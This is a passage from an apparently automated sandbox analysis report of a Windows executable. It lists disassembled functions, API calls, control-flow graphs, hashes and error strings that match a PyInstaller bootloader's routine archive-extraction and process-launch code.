                                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF64050541C), ref: 00007FF640505203
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                            • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                                            • Opcode ID: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                                                                                                                                                                                                            • Instruction ID: b58667a0859c4565491414ec19ff1220c40c75b2265e47e50320d6277c7c88b0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F51A336A0C662A6E718FF21DA811AD6760FF4A788F444539EA2DC7796DF3CE440CB40
                                                                                                                                                                                                                                                            Function 00007FF6404E85A0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                                                                                                                                            • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                                                                            • Instruction ID: 5fe66202e177d99c7f807aff829b301774400ae6d1a0f4e7f2fd14126836dceb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 45F0A432A1C652D6FB70FB60B59836A7350EB44328F040239D96D427D4CF7CD058CB00
                                                                                                                                                                                                                                                            Function 00007FF6404FFBD8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1010374628-0
                                                                                                                                                                                                                                                            • Opcode ID: 2b6c2d1e4c043c62936e9dac6caf21e199e31a345cf4845f2c7219b702089de4
                                                                                                                                                                                                                                                            • Instruction ID: eec9e4a028447adb97fbaa17f0f7e0e33bc95f8252d58717aefef1821848cd61
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b6c2d1e4c043c62936e9dac6caf21e199e31a345cf4845f2c7219b702089de4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A902E221B1D6B7A1FE68FB1195402BE228AEF42BA8F444639DD6DC73D2DE3CE4419710
                                                                                                                                                                                                                                                            Function 00007FF6404E18F0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 179 7ff6404e18f0-7ff6404e192b call 7ff6404e3f70 182 7ff6404e1bc1-7ff6404e1be5 call 7ff6404eb870 179->182 183 7ff6404e1931-7ff6404e1971 call 7ff6404e76a0 179->183 188 7ff6404e1bae-7ff6404e1bb1 call 7ff6404ef36c 183->188 189 7ff6404e1977-7ff6404e1987 call 7ff6404ef9f4 183->189 192 7ff6404e1bb6-7ff6404e1bbe 188->192 194 7ff6404e19a1-7ff6404e19bd call 7ff6404ef6bc 189->194 195 7ff6404e1989-7ff6404e199c call 7ff6404e2760 189->195 192->182 200 7ff6404e19bf-7ff6404e19d2 call 7ff6404e2760 194->200 201 7ff6404e19d7-7ff6404e19ec call 7ff6404f4154 194->201 195->188 200->188 206 7ff6404e19ee-7ff6404e1a01 call 7ff6404e2760 201->206 207 7ff6404e1a06-7ff6404e1a87 call 7ff6404e1bf0 * 2 call 7ff6404ef9f4 201->207 206->188 215 7ff6404e1a8c-7ff6404e1a9f call 7ff6404f4170 207->215 218 7ff6404e1aa1-7ff6404e1ab4 call 7ff6404e2760 215->218 219 7ff6404e1ab9-7ff6404e1ad2 call 7ff6404ef6bc 215->219 218->188 224 7ff6404e1ad4-7ff6404e1ae7 call 7ff6404e2760 219->224 225 7ff6404e1aec-7ff6404e1b08 call 7ff6404ef430 219->225 224->188 230 7ff6404e1b1b-7ff6404e1b29 225->230 231 7ff6404e1b0a-7ff6404e1b16 call 7ff6404e25f0 225->231 230->188 233 7ff6404e1b2f-7ff6404e1b3e 230->233 231->188 235 7ff6404e1b40-7ff6404e1b46 233->235 236 7ff6404e1b60-7ff6404e1b6f 235->236 237 7ff6404e1b48-7ff6404e1b55 235->237 236->236 238 7ff6404e1b71-7ff6404e1b7a 236->238 237->238 239 7ff6404e1b8f 238->239 240 7ff6404e1b7c-7ff6404e1b7f 238->240 241 7ff6404e1b91-7ff6404e1bac 239->241 240->239 242 7ff6404e1b81-7ff6404e1b84 240->242 241->188 241->235 242->239 243 7ff6404e1b86-7ff6404e1b89 242->243 243->239 244 7ff6404e1b8b-7ff6404e1b8d 243->244 244->241
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _fread_nolock$Message
                                                                                                                                                                                                                                                            • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                            • API String ID: 677216364-3497178890
                                                                                                                                                                                                                                                            • Opcode ID: 236455c93dc43fd7a620dd61a6bb9a5e6f0e22496eee16819a67f7c28e7b8b6a
                                                                                                                                                                                                                                                            • Instruction ID: 6bbb6f01bdc374e6d4f218129cfe3cf7c1562051f67e955ab5da4f0e7476a31b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 236455c93dc43fd7a620dd61a6bb9a5e6f0e22496eee16819a67f7c28e7b8b6a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2671C231B1C6A6E9EB24FB24D5902BD2390FF89784F444035D98DC77AAEE6CE5448B80
                                                                                                                                                                                                                                                            Function 00007FF6404E15C0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 137COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 245 7ff6404e15c0-7ff6404e15d1 246 7ff6404e15d3-7ff6404e15dc call 7ff6404e1050 245->246 247 7ff6404e15f7-7ff6404e1611 call 7ff6404e3f70 245->247 254 7ff6404e15ee-7ff6404e15f6 246->254 255 7ff6404e15de-7ff6404e15e9 call 7ff6404e25f0 246->255 252 7ff6404e1613-7ff6404e163a call 7ff6404e2760 247->252 253 7ff6404e163b-7ff6404e1655 call 7ff6404e3f70 247->253 261 7ff6404e1671-7ff6404e1688 call 7ff6404ef9f4 253->261 262 7ff6404e1657-7ff6404e166c call 7ff6404e25f0 253->262 255->254 268 7ff6404e16ab-7ff6404e16af 261->268 269 7ff6404e168a-7ff6404e16a6 call 7ff6404e2760 261->269 267 7ff6404e17c5-7ff6404e17c8 call 7ff6404ef36c 262->267 275 7ff6404e17cd-7ff6404e17df 267->275 272 7ff6404e16b1-7ff6404e16bd call 7ff6404e11f0 268->272 273 7ff6404e16c9-7ff6404e16e9 call 7ff6404f4170 268->273 278 7ff6404e17bd-7ff6404e17c0 call 7ff6404ef36c 269->278 279 7ff6404e16c2-7ff6404e16c4 272->279 282 7ff6404e16eb-7ff6404e1707 call 7ff6404e2760 273->282 283 7ff6404e170c-7ff6404e1717 273->283 278->267 279->278 290 7ff6404e17b3-7ff6404e17b8 282->290 285 7ff6404e171d-7ff6404e1726 283->285 286 7ff6404e17a6-7ff6404e17ae call 7ff6404f415c 283->286 289 7ff6404e1730-7ff6404e1752 call 7ff6404ef6bc 285->289 286->290 294 7ff6404e1785-7ff6404e178c 289->294 295 7ff6404e1754-7ff6404e176c call 7ff6404efdfc 289->295 290->278 297 7ff6404e1793-7ff6404e179c call 7ff6404e2760 294->297 300 7ff6404e1775-7ff6404e1783 295->300 301 7ff6404e176e-7ff6404e1771 295->301 304 7ff6404e17a1 297->304 300->297 301->289 303 7ff6404e1773 301->303 303->304 304->286
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                                                            • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                            • API String ID: 2030045667-1550345328
                                                                                                                                                                                                                                                            • Opcode ID: da3c2283609267b7beca66522936ce60a31ed649130e46d0b9ee1e579e4b20c7
                                                                                                                                                                                                                                                            • Instruction ID: dfd4575e4f547f119721587526c5d570a059d85c798b5f96c23ea6539c55306f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da3c2283609267b7beca66522936ce60a31ed649130e46d0b9ee1e579e4b20c7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC51AD61B0C663F2EA14FB25AA405B923A1FF85B98F444131EE1D87BA5EF7CE5548380
                                                                                                                                                                                                                                                            Function 00007FF6404E7FC0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89processsynchronizationCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                                                                            • String ID: CreateProcessW$Failed to create child process!
                                                                                                                                                                                                                                                            • API String ID: 2895956056-699529898
                                                                                                                                                                                                                                                            • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                                                                                            • Instruction ID: 47de76dc5fa4126ef7c5004b4db62545672ab9370504d5136caecccf2e9b28ea
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF41FB31A1CB9291EA20BB64E4952AEB2A5FB89364F500335E6AD877D9DF7CD0448B40
                                                                                                                                                                                                                                                            Function 00007FF6404E11F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 553 7ff6404e11f0-7ff6404e124d call 7ff6404eb0a0 556 7ff6404e124f-7ff6404e1276 call 7ff6404e25f0 553->556 557 7ff6404e1277-7ff6404e128f call 7ff6404f4170 553->557 562 7ff6404e1291-7ff6404e12a8 call 7ff6404e2760 557->562 563 7ff6404e12ad-7ff6404e12bd call 7ff6404f4170 557->563 568 7ff6404e1409-7ff6404e141e call 7ff6404ead80 call 7ff6404f415c * 2 562->568 569 7ff6404e12bf-7ff6404e12d6 call 7ff6404e2760 563->569 570 7ff6404e12db-7ff6404e12ed 563->570 585 7ff6404e1423-7ff6404e143d 568->585 569->568 572 7ff6404e12f0-7ff6404e1315 call 7ff6404ef6bc 570->572 579 7ff6404e1401 572->579 580 7ff6404e131b-7ff6404e1325 call 7ff6404ef430 572->580 579->568 580->579 586 7ff6404e132b-7ff6404e1337 580->586 587 7ff6404e1340-7ff6404e1368 call 7ff6404e94e0 586->587 590 7ff6404e136a-7ff6404e136d 587->590 591 7ff6404e13e6-7ff6404e13fc call 7ff6404e25f0 587->591 592 7ff6404e136f-7ff6404e1379 590->592 593 7ff6404e13e1 590->593 591->579 595 7ff6404e13a4-7ff6404e13a7 592->595 596 7ff6404e137b-7ff6404e1389 call 7ff6404efdfc 592->596 593->591 598 7ff6404e13ba-7ff6404e13bf 595->598 599 7ff6404e13a9-7ff6404e13b7 call 7ff640509140 595->599 601 7ff6404e138e-7ff6404e1391 596->601 598->587 600 7ff6404e13c5-7ff6404e13c8 598->600 599->598 603 7ff6404e13ca-7ff6404e13cd 600->603 604 7ff6404e13dc-7ff6404e13df 600->604 605 7ff6404e1393-7ff6404e139d call 7ff6404ef430 601->605 606 7ff6404e139f-7ff6404e13a2 601->606 603->591 608 7ff6404e13cf-7ff6404e13d7 603->608 604->579 605->598 605->606 606->591 608->572
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                                                            • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                            • API String ID: 2030045667-2813020118
                                                                                                                                                                                                                                                            • Opcode ID: d861c908b3ab48e6fc6dc20ba232feaabb5c99f7ec28589f5dcfaa4faba5a722
                                                                                                                                                                                                                                                            • Instruction ID: 235a19356c93ce3a42da2f38b45c00a33ccb645bdc8f96a1bfa84f363406d5ea
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d861c908b3ab48e6fc6dc20ba232feaabb5c99f7ec28589f5dcfaa4faba5a722
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A51E172A0C662E1FA20FB15A9403BA6291FB85794F440135EE5DC7BE6EF3CE541C780
                                                                                                                                                                                                                                                            Function 00007FF6404FE020 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF6404FE3BA,?,?,-00000018,00007FF6404FA063,?,?,?,00007FF6404F9F5A,?,?,?,00007FF6404F524E), ref: 00007FF6404FE19C
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF6404FE3BA,?,?,-00000018,00007FF6404FA063,?,?,?,00007FF6404F9F5A,?,?,?,00007FF6404F524E), ref: 00007FF6404FE1A8
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                            • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                                                                            • Instruction ID: b6910443d84c49c151f59c00ef2200bc76ce80b2dbad949d85a3e33c553a0d70
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A141E231B1DA22E1FA16FB17AA0467A229BFF45B90F084535DD1DC7784EE3CEA458300
                                                                                                                                                                                                                                                            Function 00007FF6404E7C40 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF6404E3834), ref: 00007FF6404E7CE4
                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF6404E3834), ref: 00007FF6404E7D2C
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E7E10: GetEnvironmentVariableW.KERNEL32(00007FF6404E365F), ref: 00007FF6404E7E47
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E7E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6404E7E69
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404F7548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6404F7561
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E26C0: MessageBoxW.USER32 ref: 00007FF6404E2736
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                            • API String ID: 740614611-1339014028
                                                                                                                                                                                                                                                            • Opcode ID: e203fb9b2ed022230aea9b70073d79c64569b0fcacf7335b186391ffe1e7d089
                                                                                                                                                                                                                                                            • Instruction ID: 05379c9ae0fcb58b5ad99494fa2f29691be71f51bb853eeff872209563e4896b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e203fb9b2ed022230aea9b70073d79c64569b0fcacf7335b186391ffe1e7d089
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00419121A0D662E0FA24FB619A55AFA2255EF957D4F405131EE1DC7796EE3CE5008380
                                                                                                                                                                                                                                                            Function 00007FF6404FAD6C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
